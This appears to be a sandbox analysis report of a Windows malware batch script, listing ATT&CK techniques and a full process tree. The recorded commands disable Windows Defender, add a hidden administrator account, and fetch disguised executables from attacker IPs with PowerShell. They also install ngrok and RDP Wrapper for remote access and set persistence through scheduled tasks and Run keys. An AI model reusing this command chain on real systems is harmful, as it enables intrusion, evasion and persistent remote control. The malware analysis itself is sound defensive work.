Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	MeshAgent.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\Telemetry\wmic.exe\VBScriptSetScriptStateStarted = "240623953"	wmic.exe

Runs net.exe

Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery

T1018

pid	Process
3832	PING.EXE
4668	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

pid	Process
1724	schtasks.exe
4808	schtasks.exe
1272	schtasks.exe
4964	schtasks.exe

Script User-Agent 2 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	53	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	54	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4572	powershell.exe
4572	powershell.exe
4788	powershell.exe
4788	powershell.exe
1852	powershell.exe
1852	powershell.exe
5012	powershell.exe
5012	powershell.exe
3276	wmic.exe
3276	wmic.exe
3276	wmic.exe
3276	wmic.exe
2984	powershell.exe
2984	powershell.exe
4496	wmic.exe
4496	wmic.exe
4496	wmic.exe
4496	wmic.exe
1996	wmic.exe
1996	wmic.exe
1996	wmic.exe
1996	wmic.exe
936	wmic.exe
936	wmic.exe
936	wmic.exe
936	wmic.exe
3856	wmic.exe
3856	wmic.exe
3856	wmic.exe
3856	wmic.exe
3212	wmic.exe
3212	wmic.exe
3212	wmic.exe
3212	wmic.exe
4372	powershell.exe
4372	powershell.exe
2848	powershell.exe
2848	powershell.exe
1992	wmic.exe
1992	wmic.exe
1992	wmic.exe
1992	wmic.exe
4272	wmic.exe
4272	wmic.exe
4272	wmic.exe
4272	wmic.exe
4992	wmic.exe
4992	wmic.exe
4992	wmic.exe
4992	wmic.exe
3280	wmic.exe
3280	wmic.exe
3280	wmic.exe
3280	wmic.exe
4364	wmic.exe
4364	wmic.exe
4364	wmic.exe
4364	wmic.exe
2956	powershell.exe
2956	powershell.exe
1080	powershell.exe
1080	powershell.exe
5116	powershell.exe
5116	powershell.exe

Suspicious behavior: LoadsDriver 11 IoCs

pid	Process
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found
668	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeIncreaseQuotaPrivilege	4572	powershell.exe
Token: SeSecurityPrivilege	4572	powershell.exe
Token: SeTakeOwnershipPrivilege	4572	powershell.exe
Token: SeLoadDriverPrivilege	4572	powershell.exe
Token: SeSystemProfilePrivilege	4572	powershell.exe
Token: SeSystemtimePrivilege	4572	powershell.exe
Token: SeProfSingleProcessPrivilege	4572	powershell.exe
Token: SeIncBasePriorityPrivilege	4572	powershell.exe
Token: SeCreatePagefilePrivilege	4572	powershell.exe
Token: SeBackupPrivilege	4572	powershell.exe
Token: SeRestorePrivilege	4572	powershell.exe
Token: SeShutdownPrivilege	4572	powershell.exe
Token: SeDebugPrivilege	4572	powershell.exe
Token: SeSystemEnvironmentPrivilege	4572	powershell.exe
Token: SeRemoteShutdownPrivilege	4572	powershell.exe
Token: SeUndockPrivilege	4572	powershell.exe
Token: SeManageVolumePrivilege	4572	powershell.exe
Token: 33	4572	powershell.exe
Token: 34	4572	powershell.exe
Token: 35	4572	powershell.exe
Token: 36	4572	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeIncreaseQuotaPrivilege	4788	powershell.exe
Token: SeSecurityPrivilege	4788	powershell.exe
Token: SeTakeOwnershipPrivilege	4788	powershell.exe
Token: SeLoadDriverPrivilege	4788	powershell.exe
Token: SeSystemProfilePrivilege	4788	powershell.exe
Token: SeSystemtimePrivilege	4788	powershell.exe
Token: SeProfSingleProcessPrivilege	4788	powershell.exe
Token: SeIncBasePriorityPrivilege	4788	powershell.exe
Token: SeCreatePagefilePrivilege	4788	powershell.exe
Token: SeBackupPrivilege	4788	powershell.exe
Token: SeRestorePrivilege	4788	powershell.exe
Token: SeShutdownPrivilege	4788	powershell.exe
Token: SeDebugPrivilege	4788	powershell.exe
Token: SeSystemEnvironmentPrivilege	4788	powershell.exe
Token: SeRemoteShutdownPrivilege	4788	powershell.exe
Token: SeUndockPrivilege	4788	powershell.exe
Token: SeManageVolumePrivilege	4788	powershell.exe
Token: 33	4788	powershell.exe
Token: 34	4788	powershell.exe
Token: 35	4788	powershell.exe
Token: 36	4788	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeIncreaseQuotaPrivilege	1852	powershell.exe
Token: SeSecurityPrivilege	1852	powershell.exe
Token: SeTakeOwnershipPrivilege	1852	powershell.exe
Token: SeLoadDriverPrivilege	1852	powershell.exe
Token: SeSystemProfilePrivilege	1852	powershell.exe
Token: SeSystemtimePrivilege	1852	powershell.exe
Token: SeProfSingleProcessPrivilege	1852	powershell.exe
Token: SeIncBasePriorityPrivilege	1852	powershell.exe
Token: SeCreatePagefilePrivilege	1852	powershell.exe
Token: SeBackupPrivilege	1852	powershell.exe
Token: SeRestorePrivilege	1852	powershell.exe
Token: SeShutdownPrivilege	1852	powershell.exe
Token: SeDebugPrivilege	1852	powershell.exe
Token: SeSystemEnvironmentPrivilege	1852	powershell.exe
Token: SeRemoteShutdownPrivilege	1852	powershell.exe
Token: SeUndockPrivilege	1852	powershell.exe
Token: SeManageVolumePrivilege	1852	powershell.exe
Token: 33	1852	powershell.exe
Token: 34	1852	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 700 wrote to memory of 4572	700	cmd.exe	81
PID 700 wrote to memory of 4572	700	cmd.exe	81
PID 700 wrote to memory of 2092	700	cmd.exe	83
PID 700 wrote to memory of 2092	700	cmd.exe	83
PID 2092 wrote to memory of 3980	2092	cmd.exe	84
PID 2092 wrote to memory of 3980	2092	cmd.exe	84
PID 700 wrote to memory of 5080	700	cmd.exe	85
PID 700 wrote to memory of 5080	700	cmd.exe	85
PID 700 wrote to memory of 5080	700	cmd.exe	85
PID 700 wrote to memory of 4788	700	cmd.exe	88
PID 700 wrote to memory of 4788	700	cmd.exe	88
PID 700 wrote to memory of 1852	700	cmd.exe	89
PID 700 wrote to memory of 1852	700	cmd.exe	89
PID 700 wrote to memory of 5012	700	cmd.exe	90
PID 700 wrote to memory of 5012	700	cmd.exe	90
PID 1892 wrote to memory of 3276	1892	MeshAgent.exe	91
PID 1892 wrote to memory of 3276	1892	MeshAgent.exe	91
PID 1892 wrote to memory of 3276	1892	MeshAgent.exe	91
PID 700 wrote to memory of 2984	700	cmd.exe	93
PID 700 wrote to memory of 2984	700	cmd.exe	93
PID 1892 wrote to memory of 4496	1892	MeshAgent.exe	94
PID 1892 wrote to memory of 4496	1892	MeshAgent.exe	94
PID 1892 wrote to memory of 4496	1892	MeshAgent.exe	94
PID 1892 wrote to memory of 1996	1892	MeshAgent.exe	96
PID 1892 wrote to memory of 1996	1892	MeshAgent.exe	96
PID 1892 wrote to memory of 1996	1892	MeshAgent.exe	96
PID 700 wrote to memory of 1616	700	cmd.exe	98
PID 700 wrote to memory of 1616	700	cmd.exe	98
PID 1616 wrote to memory of 3140	1616	net.exe	99
PID 1616 wrote to memory of 3140	1616	net.exe	99
PID 700 wrote to memory of 1900	700	cmd.exe	100
PID 700 wrote to memory of 1900	700	cmd.exe	100
PID 1900 wrote to memory of 3844	1900	net.exe	101
PID 1900 wrote to memory of 3844	1900	net.exe	101
PID 700 wrote to memory of 2740	700	cmd.exe	102
PID 700 wrote to memory of 2740	700	cmd.exe	102
PID 2740 wrote to memory of 1132	2740	net.exe	103
PID 2740 wrote to memory of 1132	2740	net.exe	103
PID 700 wrote to memory of 640	700	cmd.exe	104
PID 700 wrote to memory of 640	700	cmd.exe	104
PID 700 wrote to memory of 4072	700	cmd.exe	105
PID 700 wrote to memory of 4072	700	cmd.exe	105
PID 4072 wrote to memory of 4264	4072	net.exe	106
PID 4072 wrote to memory of 4264	4072	net.exe	106
PID 700 wrote to memory of 3360	700	cmd.exe	107
PID 700 wrote to memory of 3360	700	cmd.exe	107
PID 3360 wrote to memory of 1048	3360	net.exe	108
PID 3360 wrote to memory of 1048	3360	net.exe	108
PID 1892 wrote to memory of 936	1892	MeshAgent.exe	109
PID 1892 wrote to memory of 936	1892	MeshAgent.exe	109
PID 1892 wrote to memory of 936	1892	MeshAgent.exe	109
PID 1892 wrote to memory of 3856	1892	MeshAgent.exe	111
PID 1892 wrote to memory of 3856	1892	MeshAgent.exe	111
PID 1892 wrote to memory of 3856	1892	MeshAgent.exe	111
PID 700 wrote to memory of 5076	700	cmd.exe	113
PID 700 wrote to memory of 5076	700	cmd.exe	113
PID 1892 wrote to memory of 3212	1892	MeshAgent.exe	114
PID 1892 wrote to memory of 3212	1892	MeshAgent.exe	114
PID 1892 wrote to memory of 3212	1892	MeshAgent.exe	114
PID 700 wrote to memory of 4004	700	cmd.exe	116
PID 700 wrote to memory of 4004	700	cmd.exe	116
PID 700 wrote to memory of 1788	700	cmd.exe	117
PID 700 wrote to memory of 1788	700	cmd.exe	117
PID 700 wrote to memory of 4536	700	cmd.exe	118

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2104	attrib.exe
5072	attrib.exe
2292	attrib.exe
4588	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\xdr.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell -windowstyle hidden Add-MpPreference -ExclusionPath 'C:'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4572
- C:\Windows\system32\cmd.exe
  cmd /C net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2092
- - C:\Windows\system32\net.exe
    net use \\45.139.196.250\shear /user:WORKGROUP\smb "123123@@"
    3⤵
    PID:3980
- \??\UNC\45.139.196.250\shear\s.exe
  \\45.139.196.250\shear\s.exe -fullinstall
  2⤵
  - Sets service image path in registry
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'c:\'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4788
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:5012
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Add-MpPreference -ExclusionPath 'C:\programdata\Windata'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2984
- C:\Windows\system32\net.exe
  net user t1 Raed12346@@ /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1616
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 Raed12346@@ /add
    3⤵
    PID:3140
- C:\Windows\system32\net.exe
  net localgroup administrators t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1900
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators t1 /add
    3⤵
    PID:3844
- C:\Windows\system32\net.exe
  net localgroup Administratörer t1 /add
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2740
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup Administratörer t1 /add
    3⤵
    PID:1132
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v t1 /t REG_DWORD /d 0 /f
  2⤵
  - Hide Artifacts: Hidden Users
  PID:640
- C:\Windows\system32\net.exe
  net user t1 /active:no
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4072
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:no
    3⤵
    PID:4264
- C:\Windows\system32\net.exe
  net user t1 /active:yes
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3360
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user t1 /active:yes
    3⤵
    PID:1048
- C:\Windows\system32\ReAgentc.exe
  reagentc.exe /disable
  2⤵
  - Drops file in Windows directory
  PID:5076
- C:\Windows\system32\reg.exe
  reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU" /f
  2⤵
  PID:4004
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v ToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1788
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\PushNotifications" /v LockScreenToastEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:4536
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\MSEdge" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1136
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Notifications\Settings\Windows.Defender.SecurityCenter" /v Enabled /t REG_DWORD /d 0 /f
  2⤵
  PID:1056
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\SOFTWARE\Policies\Microsoft\Windows\Explorer" /v DisableNotificationCenter /t REG_DWORD /d 1 /f
  2⤵
  PID:2088
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:3540
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "1" /f
  2⤵
  PID:4588
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
  2⤵
  PID:1928
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v TamperProtection /t REG_DWORD /d "1" /f
  2⤵
  PID:5068
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  PID:1528
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.yml','C:\Users\Admin\AppData\Local\ngrok\ngrok.yml')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4372
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/ngrok.zip','C:\ProgramData\Windata\ngrok.zip')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://152.89.239.119/x222.jpg','C:\ProgramData\Windata\winlogin.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:2956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/WindowsUpdate.jpg','C:\ProgramData\Windata\WindowsUpdate.exe')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1080
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell Expand-Archive "ngrok.zip" -DestinationPath "."
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/auto-install-hrdp.bat','C:\ProgramData\Windata\installer.bat')
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  PID:1732
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2292
- C:\Windows\system32\attrib.exe
  attrib +s +h C:\programdata\Windata\*.*
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:4588
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:2104
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsPowerup /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\srlhost.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4808
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn Winlogo /ru "Admin" /sc minute /mo 5 /RL HIGHEST /tr "C:\ProgramData\Windata\winlogin.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:1272
- C:\Windows\system32\schtasks.exe
  schtasks /create /tn WindowsUp /ru "Admin" /sc ONSTART /DELAY 0000:30 /RL HIGHEST /tr "C:\ProgramData\Windata\WindowsUpdate.exe" /f /it
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:4964
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsPowerup" /t REG_SZ /F /D "C:\ProgramData\Windata\srlhost.exe"
  2⤵
  - Adds Run key to start application
  PID:904
- C:\Windows\system32\reg.exe
  REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "WindowsUpdatez" /t REG_SZ /F /D "C:\ProgramData\Windata\WindowsUpdate.exe"
  2⤵
  - Adds Run key to start application
  PID:2796
- C:\Windows\system32\attrib.exe
  attrib -s +h C:\programdata\Windata\*.bat
  2⤵
  - Sets file to hidden
  - Views/modifies file attributes
  PID:5072
- C:\Windows\system32\cmd.exe
  cmd /C C:\ProgramData\Windata\installer.bat
  2⤵
  - Drops file in Program Files directory
  PID:4728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/hrdp.zip','C:\ProgramData\Windata\hrdp.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    PID:2536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "C:\ProgramData\Windata\hrdp.zip" -DestinationPath "C:\ProgramData\Windata\hrdp"
    3⤵
    PID:1480
- - C:\Windows\system32\cmd.exe
    cmd /C C:\ProgramData\Windata\hrdp\install.bat
    3⤵
    PID:2772
  - - C:\ProgramData\Windata\hrdp\RDPWInst.exe
      "C:\ProgramData\Windata\hrdp\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:1236
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/update.zip','C:\Program Files\RDP Wrapper\update.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    PID:1956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell.exe (New-Object System.Net.WebClient).DownloadFile('http://45.139.196.250/hrdp/autoupdate.zip','C:\Program Files\RDP Wrapper\autoupdate.zip')
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in Program Files directory
    PID:4176
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "update.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    PID:936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Powershell Expand-Archive "autoupdate.zip" -DestinationPath "."
    3⤵
    - Drops file in Program Files directory
    PID:1320
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\rdpwrap_ini_updater.bat"
    3⤵
    - Drops file in Program Files directory
    PID:3268
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:2940
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3440
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3360
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4524
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2432
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4584
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1016
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3196
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2592
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:5012
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\re-install.bat"
    3⤵
    - Drops file in Program Files directory
    PID:1200
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:652
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      PID:1600
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:468
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      Modifies WinLogon
      Drops file in Program Files directory
      System Location Discovery: System Language Discovery
      PID:3640
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1248
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:2972
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17134.706]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1116
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.165]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:5068
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.292]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:3996
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.379]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:2704
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.17763.437]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:936
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.1]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:4688
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.53]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1272
  - - C:\Windows\system32\findstr.exe
      findstr /x /c:"[10.0.18362.267]" "C:\Program Files\RDP Wrapper\rdpwrap.ini"
      4⤵
      PID:1652
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -r
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:1764
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\helper\autoupdate__enable_autorun_on_startup.bat"
    3⤵
    PID:2292
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:1656
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /f /sc ONSTART /tn "RDP Wrapper Autoupdate" /tr "cmd.exe /C \"C:\Program Files\RDP Wrapper\autoupdate.bat\" -log" /ru SYSTEM /delay 0000:10
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1724
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell "$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries; Set-ScheduledTask -TaskName 'RDP Wrapper Autoupdate' -Settings $settings"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2204
- - C:\Windows\system32\cmd.exe
    cmd /C "C:\Program Files\RDP Wrapper\autoupdate.bat"
    3⤵
    - Drops file in Program Files directory
    PID:1668
  - - C:\Windows\system32\fsutil.exe
      fsutil dirty query C:
      4⤵
      PID:2216
  - - C:\Windows\system32\sc.exe
      sc queryex "TermService"
      4⤵
      Launches sc.exe
      PID:5028
  - - C:\Windows\system32\find.exe
      find "STATE"
      4⤵
      PID:3968
  - - C:\Windows\system32\find.exe
      find /v "RUNNING"
      4⤵
      PID:1240
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c query session rdp-tcp
      4⤵
      PID:2660
    - - C:\Windows\system32\query.exe
        
        query session rdp-tcp
        5⤵
        
        PID:2020
      - C:\Windows\system32\qwinsta.exe
        
        "C:\Windows\system32\qwinsta.exe" rdp-tcp
        6⤵
        
        PID:1104
  - - C:\Windows\system32\reg.exe
      reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\TermService\Parameters" /f /v ServiceDll /t REG_EXPAND_SZ /d "C:\Program Files\RDP Wrapper\rdpwrap.dll"
      4⤵
      Server Software Component: Terminal Services DLL
      PID:1812
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -u
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3056
    - - C:\Windows\SYSTEM32\netsh.exe
        
        netsh advfirewall firewall delete rule name="Remote Desktop"
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1128
  - - C:\Program Files\RDP Wrapper\RDPWInst.exe
      "C:\Program Files\RDP Wrapper\RDPWInst.exe" -i -o
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
